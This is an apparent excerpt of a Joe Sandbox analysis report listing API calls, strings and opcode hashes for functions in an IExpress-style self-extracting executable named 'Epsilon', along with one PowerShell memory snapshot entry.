                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandle
                                                                                • String ID:
                                                                                • API String ID: 2962429428-0
                                                                                • Opcode ID: b743c40088155ea186d23191c44c420b4fd161faa50afe9f4e766b5de3d239a5
                                                                                • Instruction ID: f379e625c779e22932a122c8355b1df6801ed3f8e387a02571ca750bfc31a5b6
                                                                                • Opcode Fuzzy Hash: b743c40088155ea186d23191c44c420b4fd161faa50afe9f4e766b5de3d239a5
                                                                                • Instruction Fuzzy Hash: 09F0F63164C785E6DB1C6F24F5800B8BA60EB08B5AF404235DE2B476C4CF38C092C720
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: Window$DialogItem$DesktopEnableLoadMessageSendStringText
                                                                                • String ID: $Adv$C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                • API String ID: 3530494346-2342008264
APIs
Strings
Similarity
• API ID: FreeLibrary$AddressAllocateInitializeLoadProc
• String ID: CheckTokenMembership$advapi32.dll
• API String ID: 4204503880-1888249752
APIs
Strings
Similarity
• API ID: ProcessToken$AdjustCloseCurrentExitHandleLookupOpenPrivilegePrivilegesValueWindows
• String ID: SeShutdownPrivilege
• API String ID: 2829607268-3733053543
APIs
Similarity
• API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 4104442557-0
APIs
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
APIs
Strings
Similarity
• API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
• String ID: "$:$@$RegServer
• API String ID: 1203814774-4077547207
APIs
• LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7378235E3), ref: 00007FF737824A86
• GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7378235E3), ref: 00007FF737824AAA
• GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7378235E3), ref: 00007FF737824ACA
• GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7378235E3), ref: 00007FF737824AEC
• GetTempPathA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7378235E3), ref: 00007FF737824B1B
• CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7378235E3), ref: 00007FF737824B3A
• CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7378235E3), ref: 00007FF737824B54
• FreeLibrary.KERNEL32 ref: 00007FF737824BF1
• FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7378235E3), ref: 00007FF737824C0D
Strings
Similarity
• API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
• String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
• API String ID: 1865808269-1731843650
APIs
Strings
Similarity
• API ID: Local$AllocMessage$EnumLanguagesResource$BeepCharCloseFreeLoadMetricsNextOpenQueryStringSystemValueVersion
• String ID: Adv$rce.
• API String ID: 2929476258-1496161719
APIs
Strings
Similarity
• API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
• String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
• API String ID: 2659952014-2428544900
APIs
Strings
Similarity
• API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
• String ID: Adv
• API String ID: 3785188418-921584719
APIs
Similarity
• API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
• String ID:
• API String ID: 2168512254-0
APIs
Strings
Similarity
• API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
• String ID: Control Panel\Desktop\ResourceLocale
• API String ID: 3346862599-1109908249
APIs
                                                                                Similarity
                                                                                • API ID: Global$Char$FileInfoNextQueryUnlockValueVersion$AllocCloseEnvironmentExpandFreeLockOpenSizeStringsUpper
                                                                                • String ID:
                                                                                • API String ID: 1051330783-0
                                                                                • Opcode ID: 6d4c51d06f972b13cb99adb0e904218bc9eace2558dcc6cb5054029ba0357b51
                                                                                • Instruction ID: ce1dbcfc39096496239755b1570651013e2c61edb86705e934ebccfa430fd4a6
                                                                                • Opcode Fuzzy Hash: 6d4c51d06f972b13cb99adb0e904218bc9eace2558dcc6cb5054029ba0357b51
                                                                                • Instruction Fuzzy Hash: 94518532A0C64AAAEB509F1594006F8BFA4FB48B96F955131DE0D63794DF3CE463D720
APIs
Memory Dump Source
• Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
• Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
Similarity
• API ID: Char$Next$Upper$ByteFileLeadModuleNamePrev
• String ID:
• API String ID: 975904313-0
• Opcode ID: 2979d283a01604d961735a48130beb2dfdd98dda21d4e4b67344f999235a94dc
• Instruction ID: 879cd6f74b21e8fb00665b72c2f06831920b31cad91ca6110b9d08b7bdafe735
• Opcode Fuzzy Hash: 2979d283a01604d961735a48130beb2dfdd98dda21d4e4b67344f999235a94dc
• Instruction Fuzzy Hash: 2751A661A0C6CDA5FB216F2594003F8EF91AB4DBA2FC98171CA8E07795CE3CD4679720
APIs
  • Part of subcall function 00007FF737825050: FindResourceExA.KERNEL32(?,?,00000000,00007FF737822E43), ref: 00007FF737825078
  • Part of subcall function 00007FF737825050: SizeofResource.KERNEL32(?,?,00000000,00007FF737822E43), ref: 00007FF737825089
  • Part of subcall function 00007FF737825050: FindResourceA.KERNEL32(?,?,00000000,00007FF737822E43), ref: 00007FF7378250AF
  • Part of subcall function 00007FF737825050: LoadResource.KERNEL32(?,?,00000000,00007FF737822E43), ref: 00007FF7378250C0
  • Part of subcall function 00007FF737825050: LockResource.KERNEL32(?,?,00000000,00007FF737822E43), ref: 00007FF7378250CF
  • Part of subcall function 00007FF737825050: memcpy_s.MSVCRT ref: 00007FF7378250EE
  • Part of subcall function 00007FF737825050: FreeResource.KERNEL32(?,?,00000000,00007FF737822E43), ref: 00007FF7378250FD
• LocalAlloc.KERNEL32(?,?,?,?,?,00007FF737823139), ref: 00007FF737823F95
• LocalFree.KERNEL32 ref: 00007FF737824018
  • Part of subcall function 00007FF737824DCC: LoadStringA.USER32 ref: 00007FF737824E60
  • Part of subcall function 00007FF737824DCC: MessageBoxA.USER32 ref: 00007FF737824EA0
  • Part of subcall function 00007FF737827700: GetLastError.KERNEL32 ref: 00007FF737827704
• lstrcmpA.KERNEL32(?,?,?,?,?,00007FF737823139), ref: 00007FF73782403E
• LocalFree.KERNEL32(?,?,?,?,?,00007FF737823139), ref: 00007FF73782409F
  • Part of subcall function 00007FF737827AC8: FindResourceA.KERNEL32 ref: 00007FF737827AF2
  • Part of subcall function 00007FF737827AC8: LoadResource.KERNEL32 ref: 00007FF737827B09
  • Part of subcall function 00007FF737827AC8: DialogBoxIndirectParamA.USER32 ref: 00007FF737827B3F
  • Part of subcall function 00007FF737827AC8: FreeResource.KERNEL32 ref: 00007FF737827B51
• LocalFree.KERNEL32 ref: 00007FF737824078
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
• Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
Similarity
• API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
• String ID: <None>$LICENSE
• API String ID: 2414642746-383193767
• Opcode ID: c1ca9a88813ebfd35d576e9851fc4e2efdb847e2dd01f63958537ee31114ed88
• Instruction ID: 404750afa5604cb55271e57821e7a1fb557a0423a6f2667c6dbd53c1f524f891
• Opcode Fuzzy Hash: c1ca9a88813ebfd35d576e9851fc4e2efdb847e2dd01f63958537ee31114ed88
• Instruction Fuzzy Hash: D2317C32A1D60AA6F750BF20E4147F9BE60FB88746FC04134C90D566A0DF7DA427AB30
APIs
  • Part of subcall function 00007FF73782114C: _vsnprintf.MSVCRT ref: 00007FF737821189
• LoadResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF73782606F), ref: 00007FF737827763
• LockResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF73782606F), ref: 00007FF737827772
• FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF73782606F), ref: 00007FF7378277B8
• FindResourceA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF73782606F), ref: 00007FF7378277EC
• FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF73782606F), ref: 00007FF737827805
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
• Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
Similarity
• API ID: Resource$Free$FindLoadLock_vsnprintf
• String ID: UPDFILE%lu
• API String ID: 2922116661-2329316264
• Opcode ID: 5da28ac000a46b9a165e15456f701c43c89cc60981a221babc32eae9389c35de
• Instruction ID: 9f57d9e7bba329b09ed4c9700e44ae832dc3e75ebfc6725b3b582ff167689714
• Opcode Fuzzy Hash: 5da28ac000a46b9a165e15456f701c43c89cc60981a221babc32eae9389c35de
• Instruction Fuzzy Hash: 2B318432A0CA49D6E710AB25A4001F9FFA1FF89B51F959635DA5E03794CF3CE416D710
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
• Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
Similarity
• API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
• String ID: wininit.ini
• API String ID: 3273605193-4206010578
• Opcode ID: 199b65378ca9828830684770953ab38004a5dc8256a53cff6ace6da1301a0c22
• Instruction ID: 52a54e7f412f9003e28c6a1c813a2aa7f9bf50341d7e316f8427828a3493639c
• Opcode Fuzzy Hash: 199b65378ca9828830684770953ab38004a5dc8256a53cff6ace6da1301a0c22
• Instruction Fuzzy Hash: 52116D32608A8597E720AF21E8442F9FBA1FBCC706FC58131DA4E43654DF3CD51ADA10
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
• Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
Similarity
• API ID: Window$Text$DesktopDialogForegroundItem
• String ID: Adv
• API String ID: 761066910-921584719
• Opcode ID: db38f3c764be4f10092f313c704ee52b3d278942d11ca53377af995edae986b7
• Instruction ID: 8ec8c43369dbddbb7f7945976f2068f4f4ca9d65cd4849c467393f7ee5ccd0d6
• Opcode Fuzzy Hash: db38f3c764be4f10092f313c704ee52b3d278942d11ca53377af995edae986b7
• Instruction Fuzzy Hash: 11117060E0C74AA6F7543B55A4182F8EE50EB8EB43FD49030C90E1A794CF3CA467E720
APIs
  • Part of subcall function 00007FF737825050: FindResourceExA.KERNEL32(?,?,00000000,00007FF737822E43), ref: 00007FF737825078
  • Part of subcall function 00007FF737825050: SizeofResource.KERNEL32(?,?,00000000,00007FF737822E43), ref: 00007FF737825089
  • Part of subcall function 00007FF737825050: FindResourceA.KERNEL32(?,?,00000000,00007FF737822E43), ref: 00007FF7378250AF
  • Part of subcall function 00007FF737825050: LoadResource.KERNEL32(?,?,00000000,00007FF737822E43), ref: 00007FF7378250C0
  • Part of subcall function 00007FF737825050: LockResource.KERNEL32(?,?,00000000,00007FF737822E43), ref: 00007FF7378250CF
  • Part of subcall function 00007FF737825050: memcpy_s.MSVCRT ref: 00007FF7378250EE
  • Part of subcall function 00007FF737825050: FreeResource.KERNEL32(?,?,00000000,00007FF737822E43), ref: 00007FF7378250FD
• LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF737823388), ref: 00007FF737824975
• LocalFree.KERNEL32(?,?,?,?,00000000,00007FF737823388), ref: 00007FF737824A11
  • Part of subcall function 00007FF737824DCC: LoadStringA.USER32 ref: 00007FF737824E60
  • Part of subcall function 00007FF737824DCC: MessageBoxA.USER32 ref: 00007FF737824EA0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
• Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
Similarity
• API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
• String ID: <None>$@$FINISHMSG
• API String ID: 3507850446-4126004490
• Opcode ID: b3ebb228102cb643f829919a1880d5340ae3d5d6023195a92137a1f68ae3d98d
• Instruction ID: ba6676e236727c9b0aac8a2ed3a53f1382961135d2e37453ba0b74d2c07f0475
• Opcode Fuzzy Hash: b3ebb228102cb643f829919a1880d5340ae3d5d6023195a92137a1f68ae3d98d
• Instruction Fuzzy Hash: 7E11D472A0C24697F760AB20E4107FAFE90FB84786F949134CE0E02695DF3CD416DB20
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
• Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
Similarity
• API ID: LibraryLoad$AttributesFile
• String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
• API String ID: 438848745-2381869747
• Opcode ID: 9f0cd13c1bb279af47be13cee5dd35000d2da7fbef8f0ef7de7ad0cc9ac3dbe3
• Instruction ID: a3d8fcd78371dc5a5b7f4f288b9d032e950f66c89b0d87fdac559bba1fa6e197
• Opcode Fuzzy Hash: 9f0cd13c1bb279af47be13cee5dd35000d2da7fbef8f0ef7de7ad0cc9ac3dbe3
• Instruction Fuzzy Hash: D011C331A1C68AA6EF61AF11D4103F8BBA0FB89715FC40235C65E02691CF3CD22BD720
APIs
Memory Dump Source
• Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
• Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
Similarity
• API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
• String ID:
• API String ID: 1273765764-0
• Opcode ID: d24c32f5bf32a5b72a732329d1a2a01ce98f5d85b6cb7ead8bb70bc12569425c
• Instruction ID: 0898105dd206425cf5eb811e43e085fb9f6126759ad5075801366fc68f15b4de
• Opcode Fuzzy Hash: d24c32f5bf32a5b72a732329d1a2a01ce98f5d85b6cb7ead8bb70bc12569425c
• Instruction Fuzzy Hash: 5E116061E0CA89A6EA606B14B5043F9EBA0FB89B56F944231CA5E463D5CF3CD0579720
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
• Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
Similarity
• API ID: EnumLanguagesMessageResourceVersion$BeepCharCloseMetricsNextOpenQuerySystemValue
• String ID: Adv
• API String ID: 2312377310-921584719
• Opcode ID: 6925faca6a2cd81837304f5f4f2fd7570e59ff5b7a5509a8ec541a78deb6dc36
• Instruction ID: 06c183c903e9cf8fee4363dc4b35d58e30288d40a86bb5893930ef63da6d1476
• Opcode Fuzzy Hash: 6925faca6a2cd81837304f5f4f2fd7570e59ff5b7a5509a8ec541a78deb6dc36
• Instruction Fuzzy Hash: 9BA1B632A1D14AB6FB60AB1194542F9FEA4FF48756FD10035E90D83A90CE3DE867E720
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
• Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
Similarity
• API ID: File$CloseCreateHandleWrite
• String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
• API String ID: 1065093856-1193786559
• Opcode ID: 0f65b1997a9f98f28a06f8ce24cdc0a961af7feeb94d9fcacdfae0386ba340ac
• Instruction ID: 42f9e4989e013dbf2a42967cc0ed48c5205eab1f0990b3901e9f4ffc5a4aedef
• Opcode Fuzzy Hash: 0f65b1997a9f98f28a06f8ce24cdc0a961af7feeb94d9fcacdfae0386ba340ac
• Instruction Fuzzy Hash: C231AD3260C68596EB109F21E4407FABBA0FB89B95F944238DB9D47794CF7CD41ADB20
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: *MEMCAB
                                                                                • API String ID: 0-3211172518
                                                                                • Opcode ID: 84e3e731c747766a29489c21773a7ead2eab1f416db6fdf01ae2d5964e993175
                                                                                • Instruction ID: 86b0ddb7e50995f5fde2c0ff1d4fc16e947cee50ae2ad58e343f8ed21ef81d96
                                                                                • Opcode Fuzzy Hash: 84e3e731c747766a29489c21773a7ead2eab1f416db6fdf01ae2d5964e993175
                                                                                • Instruction Fuzzy Hash: 1D314C31A4EB4AA5EB50AB11F4483F9BBA0BB44752FC44276D96C42390DF3CE466D720
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                • String ID:
                                                                                • API String ID: 140117192-0
                                                                                • Opcode ID: 2331a3b639adea238e9a50b849fe14964fd45a281eaa4897dacf7bdda2e71fe4
                                                                                • Instruction ID: b1d48fb51584d7c69f51c7f21857e6424c9469a930e844a97483cbc77491a9b0
                                                                                • Opcode Fuzzy Hash: 2331a3b639adea238e9a50b849fe14964fd45a281eaa4897dacf7bdda2e71fe4
                                                                                • Instruction Fuzzy Hash: DD41FC35A0CB09A1EB10AB18F8943B5BBA4FB88745FD04536D98D43764DF3DE066E760
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: Char$Prev$Next
                                                                                • String ID:
                                                                                • API String ID: 3260447230-0
                                                                                • Opcode ID: 707050412bb26cc287988f04cda4ab0ae1f580e9279edb24177e5c3a1430149b
                                                                                • Instruction ID: c0b840faf548f3bf54b7d8b6dfd17478b703fc60b7fd9a7d4b8f09eb82d53688
                                                                                • Opcode Fuzzy Hash: 707050412bb26cc287988f04cda4ab0ae1f580e9279edb24177e5c3a1430149b
                                                                                • Instruction Fuzzy Hash: 9611A762A0C685A5FB111B22A5001B9EFA1E749FF2F898234DB5E03794CF2CD4528710
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                • String ID:
                                                                                • API String ID: 140117192-0
                                                                                • Opcode ID: f2b1ddacced677a847f8148696c66bf38e9a023ccacb3690f052d0a45ab1694c
                                                                                • Instruction ID: de420e6e9894f314f910e099406b4e730c935eb60844f3d8335584a0ea8c8e9f
                                                                                • Opcode Fuzzy Hash: f2b1ddacced677a847f8148696c66bf38e9a023ccacb3690f052d0a45ab1694c
                                                                                • Instruction Fuzzy Hash: 9A21193590CB49A1EB00AF04F8843A5BBA0FB84746FD00536DA8D53764DF3EE066E760
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                • String ID:
                                                                                • API String ID: 2776232527-0
                                                                                • Opcode ID: 7c1b033473dba301dd4ecd47eb6d04f722b5b1254afffa929906cb3dfbdd32c6
                                                                                • Instruction ID: 8d79c4cc81d9df383e8940ad33c58f716b3bd0bc0e57066fb9237d56be8273ae
                                                                                • Opcode Fuzzy Hash: 7c1b033473dba301dd4ecd47eb6d04f722b5b1254afffa929906cb3dfbdd32c6
                                                                                • Instruction Fuzzy Hash: 6F117772A1C646A7F7A0AF20E454BB6FE90FB99746FC09130DA4A42D84DF3CD05ADB10
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2467907001.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7ff848d50000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                • Instruction ID: df177d92b8830416bef37d5717a16d9952393f763a851a515b6ab36be9f87dc5
                                                                                • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                • Instruction Fuzzy Hash: 2D01847010CB0C4FD748EF0CE051AB6B3E0FB85364F10056EE58AC3651D726E882CB45